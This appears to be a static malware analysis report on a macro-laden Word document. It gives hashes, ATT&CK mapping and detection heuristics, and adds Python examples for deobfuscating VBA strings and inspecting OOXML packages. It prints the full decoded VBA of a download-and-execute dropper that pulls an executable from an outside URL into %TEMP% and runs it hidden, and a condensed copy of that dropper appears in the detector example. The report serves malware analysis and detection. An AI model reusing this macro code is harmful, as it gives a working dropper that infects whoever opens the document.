Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 77fca797d90ba2d5…

MALICIOUS

Office (OOXML)

Size: 174.7 KB
Created: 2019-01-31 22:06:00 UTC
Authoring application: Microsoft Office Word 14.0000 (Word 2010)
First seen: 2020-01-07
MD5: 855c477845661648ddc408f411a98649
SHA-1: 62917e3b239fdf1ea9caf4594afe0c7cf763120d
SHA-256: 77fca797d90ba2d575fe7bc6620209cd9151a290a72dbc3b352e1c7180bdf9dc
Risk score: 298

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1105 Ingress Tool Transfer

The sample is a Word document in OOXML form whose VBA project (word/vbaProject.bin) is a download-and-execute dropper. Document_Open in ThisDocument calls AA5stdi0z31nl, which rebuilds its strings at run time: the download URL is stored reversed and recovered with StrReverse (it decodes to http://metropoly[.]cl/wp-content/image.exe, defanged here), and the drop path is Environ$("temp"), with the variable name assembled from Chr() calls, joined to StrReverse("exe.cod"), i.e. %TEMP%\doc.exe. The sub adding fetches the URL with WinHttp.WinHttpRequest.5.1 and, if the response status is 200, writes the response body to that path through a binary ADODB.Stream (Type = 1, SaveToFile); substracnoop then launches the dropped file with WScript.Shell.Run. INVISIBLE and NOWAIT are never declared and the module has no Option Explicit, so they evaluate to Empty, which Run takes as window style 0 (hidden) and as "do not wait". Nothing checks that the download succeeded before the Run call; under On Error Resume Next a failed download simply leaves nothing to execute. The project is padded with dozens of unused Dim blocks, filler subs and dead loops to dilute keyword scanning, and End terminates the macro as soon as the payload has been launched.

Heuristics (9)

  • ClamAV: Doc.Dropper.Agent-7100814-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7100814-0
  • VBA project inside OOXML [medium, 6 related findings] OOXML_VBA
    Document contains a VBA project (word/vbaProject.bin); VBA macros are present.
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell is instantiated and its Run method is used to launch the dropped file.
    Matched line in script
    Set w = CreateObject("WScript.Shell")
  • VBA downloads and writes a file to disk [critical] OLE_VBA_HTTP_DROP_EXEC
    The macro reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec and Shell paths this is a download-and-execute dropper; the check still fires when the COM ProgIDs are built dynamically to evade keyword scanning. In this sample the ProgIDs are plain literals, and it is the URL and the drop path that are obfuscated (StrReverse and Chr() concatenation).
    Matched line in script
            .Write r.ResponseBody
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Late-bound object creation through CreateObject. The script creates WScript.Shell, WinHttp.WinHttpRequest.5.1, Scripting.FileSystemObject and ADODB.Stream this way.
    Matched line in script
    Set w = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This check catches p-code-only documents and documents where source extraction fails, so it does not depend on the decoded source shown below.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open runs automatically when the document is opened (subject to the macro security setting); here it is the entry point of the whole chain.
    Matched line in script
    Public Sub Document_Open()
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    Environ$() resolves the %TEMP% directory. The variable name "temp" is assembled from Chr() calls and the file name from StrReverse("exe.cod"), giving %TEMP%\doc.exe as the drop path.
    Matched line in script
     s = Environ$(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & "\" & StrReverse("exe.cod")
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL listed below is an OOXML / WordprocessingML namespace or schema URI, not a network indicator. The only network indicator in this sample is the reversed download URL inside the macro, which is absent from this list because it never appears as a plain string.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)
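The following Python is an added example and is not the report's own tooling or the analysis engine's rules. It folds the three string tricks this macro uses (Chr() concatenation, StrReverse on a literal, and a variable assigned once and reversed later), resolves Environ$() to the %VAR% form, and then tests the deobfuscated text for the auto-exec, HTTP fetch, write-to-disk and shell stages that the OLE_VBA_HTTP_DROP_EXEC finding describes. The stage regexes are my approximation of that heuristic. The sample input is a condensed transcription of the live subs from the macros.bas artifact above; the benign control macro is constructed.

```python
"""Added example, not the report's tooling: fold this macro's string obfuscation
and then test the result for the download-drop-execute stages that the
OLE_VBA_HTTP_DROP_EXEC heuristic describes (stage regexes are my approximation)."""
import re

# Constructed input: the live subs of the report's macros.bas artifact, condensed
# (junk Dim blocks, filler subs, dead loops and the FileSystemObject cleanup removed).
SAMPLE_VBA = r'''
Public Sub Document_Open()
AA5stdi0z31nl
End Sub
Sub AA5stdi0z31nl()
 l = "exe.egami/tnetnoc-pw/lc.yloportem//:ptth"
 s = Environ$(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & "\" & StrReverse("exe.cod")
 adding StrReverse(l), s
 substracnoop s, ""
 End
End Sub
Sub substracnoop(f, a)
 Set w = CreateObject("WScript.Shell")
 w.Run f & " " & a & " ", INVISIBLE, NOWAIT
End Sub
Sub adding(u, f)
 Set r = CreateObject("WinHttp.WinHttpRequest.5.1")
 r.Open "GET", u, False
 r.Send
 If r.Status = 200 Then
  Set st = CreateObject("ADODB.Stream")
  st.Type = 1
  st.Open
  st.Write r.ResponseBody
  st.SaveToFile f
  st.Close
 End If
End Sub
'''
# Constructed benign control: an auto-exec macro with no network or shell stage.
BENIGN_VBA = 'Sub Document_Open()\n MsgBox "Welcome"\nEnd Sub\n'

def fold_chr(src):
    """Chr(116) & Chr(101) & ... -> "temp"."""
    chain = re.compile(r'Chr\(\d+\)(?:\s*&\s*Chr\(\d+\))*')
    return chain.sub(lambda m: '"' + "".join(chr(int(c)) for c in re.findall(r'\d+', m.group(0))) + '"', src)

def fold_environ(src):
    """Environ$("temp") -> "%TEMP%", so the drop path reads as it will on disk."""
    return re.sub(r'Environ\$?\("([^"]*)"\)', lambda m: '"%' + m.group(1).upper() + '%"', src)

def propagate_literals(src):
    """Inline string variables that are assigned one bare literal (here l = "...")."""
    assigned = {}
    for m in re.finditer(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', src, re.M):
        assigned.setdefault(m.group(1), []).append(m.group(2))
    for name, vals in assigned.items():
        if len(vals) == 1:
            src = re.sub(r'\b%s\b' % re.escape(name), lambda _m, v=vals[0]: '"' + v + '"', src)
    return src

def fold_strreverse(src):
    """StrReverse("literal") -> the reversed literal."""
    return re.sub(r'StrReverse\("([^"]*)"\)', lambda m: '"' + m.group(1)[::-1] + '"', src)

def fold_concat(src):
    """"a" & "b" -> "ab", repeated until no adjacent literals remain."""
    pair = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')
    while True:
        new = pair.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
        if new == src:
            return src
        src = new

def deobfuscate(src):
    for step in (fold_chr, fold_environ, propagate_literals, fold_strreverse, fold_concat):
        src = step(src)
    return src

URL_RE = re.compile(r'https?://[^\s"]+')
PATH_RE = re.compile(r'"((?:%[A-Z]+%|[A-Za-z]:)\\[^"]+)"')

def extract_iocs(src):
    """URLs and drop paths that are visible only after deobfuscation."""
    d = deobfuscate(src)
    return {"urls": sorted(set(URL_RE.findall(d))), "paths": sorted(set(PATH_RE.findall(d)))}

STAGES = {
    "auto_exec": r'\b(?:Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec)\b',
    "http_fetch": r'WinHttp\.WinHttpRequest|MSXML2\.(?:Server)?XMLHTTP|Microsoft\.XMLHTTP',
    "write_to_disk": r'\.ResponseBody[\s\S]*?\.SaveToFile',
    "execute": r'WScript\.Shell[\s\S]*?\.Run\b|\bShell\s*\(',
}

def dropper_stages(src):
    """Which stages of the chain are present; run on deobfuscated text so built-up strings count."""
    d = deobfuscate(src)
    return {name: re.search(pat, d, re.I) is not None for name, pat in STAGES.items()}

def is_http_drop_exec(src):
    """Fire only when every stage is present, like the report's combined finding."""
    return all(dropper_stages(src).values())
```

Running extract_iocs(SAMPLE_VBA) yields the decoded download URL and the %TEMP%\doc.exe drop path, neither of which a plain string scan of the original source would find; is_http_drop_exec is True for the sample and False for the benign control, which has the auto-exec stage only. The folding is deliberately syntactic (no VBA emulation), so it will miss strings built in loops or through arithmetic; that is the gap the p-code heuristic in the report is meant to cover.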

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename            Kind          Source                                                            Size
macros.bas          vba-macro     oletools.olevba.extract_macros (decoded VBA source from OOXML)    10568 bytes
SHA-256: b9f54c91495ae87608a9489ddad70fc68cebfe47403440a48665aa236ff16f12

Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()

AA5stdi0z31nl
End Sub


Attribute VB_Name = "zz0tqf1kawi"


Public Sub ystelxijbhl()

Dim ryoyy5jl4bk As String
Dim AA5mjnsxwdsne As String
Dim ferrw0uue05 As String
Dim z3h5qzf2zox As String
Dim AA4n1zrse3n1w As String
Dim uujdof3ylez As String
Dim AA51nxjwnem50 As String
Dim ghi4jmnhlf2 As String
Dim bbw3lqu2tf3 As String
Dim ibmulzvawgp As String
Dim o0502znz0r1 As String
Dim leipjrkdl0k As String
Dim pvp1oyygms4 As String
Dim znk14mtnb3g As String
Dim qn0d3voqeur As String
Dim AA0zcutnoc1jf As String
Dim tyyr2cfx1rt As String
Dim qqibi3iwdmz As String
Dim vaqt4rvb3xv As String
Dim vvpy4ekknjr As String
End Sub

Public Sub AA2c15gkukivm()

Dim zdm4xaatoxj As String
Dim mrbmaqk4rc3 As String
Dim rbq05u1zs0t As String
Dim eggah01y4ji As String
Dim wjodpe34jpe As String
Dim AA44s3u3kvzwz As String
Dim qnmdw2frckr As String
Dim o3rpqf1jqdk As String
Dim hakg2i3fwjw As String
Dim AA5lcggy2jndi As String
Dim r31ox5zgxdw As String
Dim jrio0qyu4ml As String
Dim vjiduouz5is As String
Dim gfhrnftmuep As String
Dim qpjjlcyfy2g As String
Dim zlmwmjyhndp As String
Dim ceoxm0crriz As String
Dim l4fqjtxqf11 As String
Dim AA3lxqenjypb5 As String
Dim j24xrk4vpia As String
End Sub

Public Sub AA1actmzztfur()

Dim d5va01ukd4h As String
Dim sr5iyvt1msp As String
Dim besup0vf3se As String
Dim wnzsoeo3cm5 As String
Dim d4kqhfwyyav As String
Dim AA4oxpfqg5414 As String
Dim AA2idjwdtmtgi As String
Dim loz0ndcb3is As String
Dim i1zun1guglc As String
Dim steov0xngcz As String
Dim gih2q3akwzx As String
Dim AA4yt3iglftaa As String
Dim w251xlr1b44 As String
Dim wwoteojabzz As String
Dim ibkbkkjd34v As String
Dim AA0aqkpt44npk As String
Dim AA3hd5tvtzwtj As String
Dim v124rvijku3 As String
Dim igfxsibpmir As String
Dim kaadddu3ab1 As String
End Sub

Public Sub w2clvzyjc21()

Dim kdhqk1ctzk3 As String
Dim AA3gzj0wquh5j As String
Dim AA2a0w2iflen5 As String
Dim lv1dm53etks As String
Dim xru22pdniqt As String
Dim gluxqqeieue As String
Dim AA3t2amo4nrxw As String
Dim t2o3xzhzfmu As String
Dim ruti1irwdyk As String
Dim uk5sqhyifcj As String
Dim kvyyjuiqqc1 As String
Dim AA1qppdt0o31m As String
Dim jglzqafesvw As String
Dim elic0jydrpw As String
Dim etusq2mot1f As String
Dim cizgmy0egiz As String
Dim z2x22q2dcie As String
Dim n4fr14mgrhi As String
Dim AA1xajqin25ff As String
Dim twj04ijqs1d As String
End Sub

Public Sub hpsv420vsy5()

Dim gcmyrduf4iv As String
Dim qh2sr2rrnd1 As String
Dim AA31zjmsr3b02 As String
Dim t2xewbtuzsh As String
Dim vvsppzu5nxx As String
Dim rfioiidcawh As String
Dim yoirmyc0zuf As String
Dim dcoftgrhypg As String
Dim f4i2kb4gnzu As String
Dim lbs10xzafij As String
Dim lclgtbqipd0 As String
Dim zbupahtxe0o As String
Dim AA3s5g4qs5ah5 As String
Dim vdknc4tftrf As String
Dim neo5scxlc2t As String
Dim n0cy1nudg5i As String
Dim AA0eyjlxasjur As String
Dim ekyduq5sp4o As String
Dim lyhtjbg5jn0 As String
Dim AA0zdk4flrddm As String
End Sub

Public Sub d0mm43bey2u()

Dim qx2bsar54y3 As String
Dim u10ri3u5j1b As String
Dim kmadxg1sgj5 As String
Dim nzyqt4djdwr As String
Dim ukuhw4hxgzz As String
Dim hkuakvszy2k As String
Dim AA1mjshabjpck As String
Dim laikffh4q2v As String
Dim wg10dxqs1g0 As String
Dim bqmtopyny3e As String
Dim sti4mobbhro As String
Dim xggz5bi3krg As String
Dim o4rjtytb5p0 As String
Dim ylywhvvzffs As String
Dim wiilonjmjkp As String
Dim sfq1rbiw0xj As String
Dim AA2mh5t2hwrlf As String
Dim au4ay5drzwa As String
Dim lp0kzcpoflh As String
Dim yu3ppeapzqi As String
End Sub

Public Sub dxpgfmr4ngc()

Dim uidlbulvy0q As String
Dim aohgb22dt32 As String
Dim upgg0qrex4i As String
Dim ay53ys5njgz As String
Dim z2bcrlpicfp As String
Dim vwn2ibwy32n As String
Dim k13d0ta02i4 As String
Dim AA4w4si12nusi As String
Dim AA3hsxejnd0cj As String
Dim p1f0j5kedgb As String
Dim szkby0ykxfu As String
Dim sg3jp3ax4je As String
Dim cwer0v3tshj As String
Dim AA1wa3u3dnhav As String
Dim zhtt1xklkom As String
Dim wmcaldgea1r As String
Dim kak1ayktxxn As String
Dim axhpacl315n As String
Dim AA13mwhayup3l As String
Dim ti2dl2rhi2m As String
End Sub

Public Sub AA3hzbdo3zrlc()

Dim okulfrrc52j As String
Dim AA5vcoet3waxr As String
Dim vf5dqom1rjn As String
Dim c42e4j3gkt5 As String
Dim AA3btkxi3xzve As String
Dim enqsimcfyvx As String
Dim AA2shyckbnl3u As String
Dim cwxb4vr3nx4 As String
Dim AA23gbmpcl2x1 As String
Dim qwlwdu5ypyw As String
Dim ve35bc4ov4b As String
Dim uspxsj252dp As String
Dim x2qmaxsoe4y As String
Dim xow0eu5plpt As String
Dim ao1ox4dbgqd As String
Dim fdt1flixqxg As String
Dim byxz3g3i2qb As String
Dim etplbv012ks As String
Dim vefatc3g4u2 As String
Dim dfde3mpui4x As String
End Sub

Public Sub uztmibscdwv()

Dim AA4hj3wb2ybxc As String
Dim x3tzcedpzes As String
Dim rgobiagljjd As String
Dim swdsnans25o As String
Dim AA3vwulrbj2om As String
Dim alk50ucpyz0 As String
Dim ta0goqiz3ft As String
Dim vlcetau2nvq As String
Dim AA5jnryiaggbj As String
Dim szz1uzx4pvi As String
Dim ds5nlta4n0h As String
Dim d0jirgvgrri As String
Dim epc3030qmlc As String
Dim AA1uu0pwfwml4 As String
Dim AA3n0yfnit0ta As String
Dim u4a21xqzkrt As String
Dim hnu4f5ona5i As String
Dim oki35hijoej As String
Dim ekottvl4so4 As String
Dim d2xcxqipyw3 As String
End Sub

Public Sub kstbzhpt2tk()

Dim AA32t3woyl3ot As String
Dim uzfsalldq5k As String
Dim mj51suyfsqb As String
Dim cq2cag5vw2e As String
Dim y5mclcjibop As String
Dim AA31dy13go3ra As String
Dim AA5lafkojc1c2 As String
Dim scg2sima3e3 As String
Dim AA205y255rxzp As String
Dim AA42pkxp30w22 As String
Dim d5b0mckxw0j As String
Dim b1tpatr3gxp As String
Dim be44omt4p2g As String
Dim ur0xjn134g5 As String
Dim AA2ke2u1rbbfb As String
Dim f4etpt4fjrs As String
Dim ycrxe3eix1z As String
Dim hwnqxbdkva1 As String
Dim o0g4z1sp43l As String
Dim a2miergzpng As String
End Sub




Sub AA5stdi0z31nl()

 Dim s As String

 l = "exe.egami/tnetnoc-pw/lc.yloportem//:ptth"

  On Error Resume Next
 
Dim ob2dua5uope As String
Dim AA14kaks04vhr As String
Dim u3tut2sh5ta As String
Dim qebkzzladvb As String
Dim pch1gp2p025 As String
Dim sru2gzci0on As String
Dim AA3qfa0p0sser As String
Dim AA1t1gzn5kqsu As String
Dim zwaulqjotbo As String
Dim fnmg405sk13 As String
Dim rlcsqwrjkeh As String
Dim iburpnfsf1w As String
Dim mma3fskvkvl As String
Dim x0kv5fxf3qy As String
Dim gjaet22ap2g As String
Dim jsg2agy31y1 As String
Dim zs4qmtlizao As String
Dim dygp42hfkb4 As String
Dim u5o5ta41dmn As String
Dim n4ou4co5jrj As String

 s = Environ$(Chr(116) & Chr(101) & Chr(109) & Chr(112)) & "\" & StrReverse("exe.cod")
 

 adding StrReverse(l), s
 substracnoop s, ""
 
 End
End Sub
Sub substracnoop(f, a)

 On Error Resume Next
 
 Dim ob2dua5uope As String
Dim AA14kaks04vhr As String
Dim u3tut2sh5ta As String
Dim qebkzzladvb As String
Dim pch1gp2p025 As String
Dim sru2gzci0on As String
Dim AA3qfa0p0sser As String
Dim AA1t1gzn5kqsu As String
Dim zwaulqjotbo As String
Dim fnmg405sk13 As String
Dim rlcsqwrjkeh As String
Dim iburpnfsf1w As String
Dim mma3fskvkvl As String
Dim x0kv5fxf3qy As String
Dim gjaet22ap2g As String
Dim jsg2agy31y1 As String
Dim zs4qmtlizao As String
Dim dygp42hfkb4 As String
Dim u5o5ta41dmn As String
Dim n4ou4co5jrj As String


Set w = CreateObject("WScript.Shell")
w.Run f & " " & a & " ", INVISIBLE, NOWAIT
End Sub
 Sub adding(u, f)
 On Error Resume Next
 
 Dim ob2dua5uope As String
Dim AA14kaks04vhr As String
Dim u3tut2sh5ta As String
Dim qebkzzladvb As String
Dim pch1gp2p025 As String
Dim sru2gzci0on As String
Dim AA3qfa0p0sser As String
Dim AA1t1gzn5kqsu As String
Dim zwaulqjotbo As String
Dim fnmg405sk13 As String
Dim rlcsqwrjkeh As String
Dim iburpnfsf1w As String
Dim mma3fskvkvl As String
Dim x0kv5fxf3qy As String
Dim gjaet22ap2g As String
Dim jsg2agy31y1 As String
Dim zs4qmtlizao As String
Dim dygp42hfkb4 As String
Dim u5o5ta41dmn As String
Dim n4ou4co5jrj As String


  Set r = CreateObject("WinHttp.WinHttpRequest.5.1")
 r.Open "GET", u, False
 r.Send
 
 Dim pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej As String
Dim aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf As String
Dim zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr As Integer
Dim a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf As Long
Dim jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky As Integer

pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259
a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf = 837
For jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky = 0 To 5
pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "a6wqfhp552gynsfhwndl88m8h6l8yjbipmgdsp0wjh441b5nr45520"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "aniunjxmasv1ua2wclxs4abkb0rivhksa2ysy7e8qv0yqiqj8t3146"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1841
a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf = 1745
Next jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky


 Set fs = CreateObject("Scripting.FileSystemObject")
  If fs.FileExists(f) Then
    fs.DeleteFile (f)
  End If
  
  aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "aniunjxmasv1ua2wclxs4abkb0rivhksa2ysy7e8qv0yqiqj8t3146"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1841
a2r8nz6hlum7lxam2eq2ygfmams69j1p2rkr1upchwbmk2zonf = 1745
'Next jthbyjh5idr2rt1r7v8bftmm617ow54tdcj4tcx9rr4hyqyyky

  If r.Status = 200 Then
    Set st = CreateObject("ADODB.Stream")
    
    
    pcu7tc3uv8l8bgcl0jlqllembipr36ifzucfs9wv775f949mej = "b9hk3rworqvbit1w66ky2iloq2eg6s9rvxbdouxperze4ikd8g353"
aducqxipu5flk4dg5hd4iixslzog8p76l72z8f8wj9h7geitjf = "gkdhrltvqivm32wvcb3mrfo6d7x6a2xp9hsqji6o3cu0jiwr923148"
zxz563wjfyiaqihjpsc4vwamebizpdhvt3uqezbxjqqzj0qhyr = 1259


    With st
        .Type = 1
        .Open
        .Write r.ResponseBody
        .SaveToFile f
        .Close
    End With
    Set st = Nothing
  End If
 End Sub
Filename            Kind          Source                                                            Size
vbaProject_00.bin   vba-project   OOXML VBA project: word/vbaProject.bin                            35328 bytes
SHA-256: 81ce51c1164164561ca131d560bae770cf0f9d415528f98f4003b40c000ebc1e
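The Python below is an added example, not the report's extraction code, showing how the two container-level findings above (OOXML_VBA and EMBEDDED_URL) are reached without any VBA parsing: it opens the OOXML zip, locates the word/vbaProject.bin part and the [Content_Types].xml override and relationship that declare it, and splits the URLs found in the package XML into namespace/relationship-type URIs and real external targets. The package it inspects is constructed in memory as a stand-in for the sample (the hyperlink to example.invalid and the dummy vbaProject.bin bytes are mine), so it runs offline.

```python
"""Added example, not the report's tooling: find the VBA project part in an OOXML
package and separate schema/namespace URIs from real external targets."""
import io
import re
import zipfile

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
VBA_REL_TYPE = "http://schemas.microsoft.com/office/2006/relationships/vbaProject"
URL_RE = re.compile(r'https?://[^\s"\'<>]+')
# Any xmlns declaration or relationship Type value is a schema URI, not a network indicator.
NS_OR_TYPE_RE = re.compile(r'(?:xmlns(?::\w+)?|Type)="([^"]+)"')


def build_sample_docx(with_vba=True):
    """Constructed stand-in for the sample: a minimal Word package with one external
    hyperlink and, optionally, a word/vbaProject.bin part declared the way Word does.
    The VBA part is only the CFB magic plus padding, not a real project."""
    main_ct = ("application/vnd.ms-word.document.macroEnabled.main+xml" if with_vba
               else "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml")
    overrides = ['<Override PartName="/word/document.xml" ContentType="%s"/>' % main_ct]
    rels = ['<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" '
            'Target="http://example.invalid/landing" TargetMode="External"/>']
    parts = {}
    if with_vba:
        overrides.append('<Override PartName="/word/vbaProject.bin" ContentType="%s"/>' % VBA_CONTENT_TYPE)
        rels.append('<Relationship Id="rId1" Type="%s" Target="vbaProject.bin"/>' % VBA_REL_TYPE)
        parts["word/vbaProject.bin"] = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 64  # constructed
    parts["[Content_Types].xml"] = (
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>' + "".join(overrides) + '</Types>')
    parts["word/document.xml"] = (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><w:body>'
        '<w:p><w:hyperlink r:id="rId9"><w:r><w:t>invoice</w:t></w:r></w:hyperlink></w:p></w:body></w:document>')
    parts["word/_rels/document.xml.rels"] = (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        + "".join(rels) + '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, body in parts.items():
            z.writestr(name, body)
    return buf.getvalue()


def inspect_ooxml(data):
    """Return VBA-presence evidence and a URL split for an OOXML package given as bytes."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        xml = {n: z.read(n).decode("utf-8", "replace") for n in names if n.endswith((".xml", ".rels"))}
    vba_parts = [n for n in names if n.lower().endswith("vbaproject.bin")]
    schema_uris, all_urls, external = set(), set(), []
    for name, body in xml.items():
        schema_uris.update(NS_OR_TYPE_RE.findall(body))
        all_urls.update(URL_RE.findall(body))
        # Only relationships flagged TargetMode="External" point outside the package.
        for rel in re.findall(r'<Relationship\b[^>]*TargetMode="External"[^>]*/>', body):
            target = re.search(r'Target="([^"]+)"', rel)
            if target:
                external.append((name, target.group(1)))
    return {
        "has_vba": bool(vba_parts),
        "vba_parts": vba_parts,
        "vba_in_content_types": VBA_CONTENT_TYPE in xml.get("[Content_Types].xml", ""),
        "vba_relationship_in": [n for n, b in xml.items() if VBA_REL_TYPE in b],
        "schema_uris": sorted(all_urls & schema_uris),
        "candidate_indicators": sorted(all_urls - schema_uris),
        "external_targets": external,
    }
```

For the constructed package, inspect_ooxml reports the vbaProject.bin part together with its content-type override and relationship, lists the namespace URIs (the same kind of entries that fill the EMBEDDED_URL finding above) separately, and leaves only the external hyperlink target as a candidate indicator. A part named differently from vbaProject.bin would still be caught through the content-type override or the relationship type, which is why the check records all three pieces of evidence rather than the file name alone.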